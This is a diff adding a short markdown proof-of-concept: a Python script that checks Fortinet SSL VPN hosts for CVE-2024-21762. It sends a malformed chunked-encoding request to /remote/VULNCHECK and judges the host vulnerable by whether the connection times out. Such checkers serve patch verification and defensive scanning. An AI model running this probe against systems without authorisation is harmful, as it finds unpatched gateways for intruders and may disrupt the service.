Create Fortinet-SSL-VPN-CVE-2024-21762.md

Fortinet-SSL-VPN-CVE-2024-21762.md

@@ -0,0 +1,69 @@
+## Fortinet-SSL-VPN-CVE-2024-21762
+
+
+
+## poc
+```python
+import socket
+import ssl
+import sys
+context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+context.check_hostname=False
+context.verify_mode=ssl.CERT_NONE
+
+# should be fine for most hosts, increase this if you're getting errors.
+TIMEOUT=5
+
+def send_req(host, req):
+    try:
+        s=socket.create_connection(host, timeout=5)
+    except: return -1
+    ss=context.wrap_socket(s)
+    ss.send(req)
+    try:
+        return ss.read(2048)
+    except socket.timeout:
+        return 0
+
+control_req="""POST /remote/VULNCHECK HTTP/1.1\r
+Host: {}\r
+Transfer-Encoding: chunked\r
+\r
+0\r
+\r
+\r
+"""
+
+check_req="""POST /remote/VULNCHECK HTTP/1.1\r
+Host: {}\r
+Transfer-Encoding: chunked\r
+\r
+0000000000000000FF\r
+\r
+"""
+def check(host):
+    baseurl="https://{}:{}".format(*host)
+    r1=send_req(host, control_req.format(baseurl).encode())
+    if r1==-1:
+        return "Connection Failed"
+    if r1==0:
+        return "Control request failed"
+        return
+    if b"HTTP/1.1 403 Forbidden" not in r1:
+        print("[warning] Server does not look like a Fortinet SSL VPN interface")
+    r2=send_req(host, check_req.format(baseurl).encode())
+    if r2==0: return "Vulnerable"
+    else: return "Patched"
+
+if __name__=="__main__":
+    try:
+        host=sys.argv[1]
+        port=int(sys.argv[2])
+    except:
+        print("Usage: check-cve-2024-21762.py <host> <port>")
+        exit()
+    HOST=(host,port)
+    print(check(HOST))
+```
+
+```python3 check-cve-2024-21762.py <host> <port>```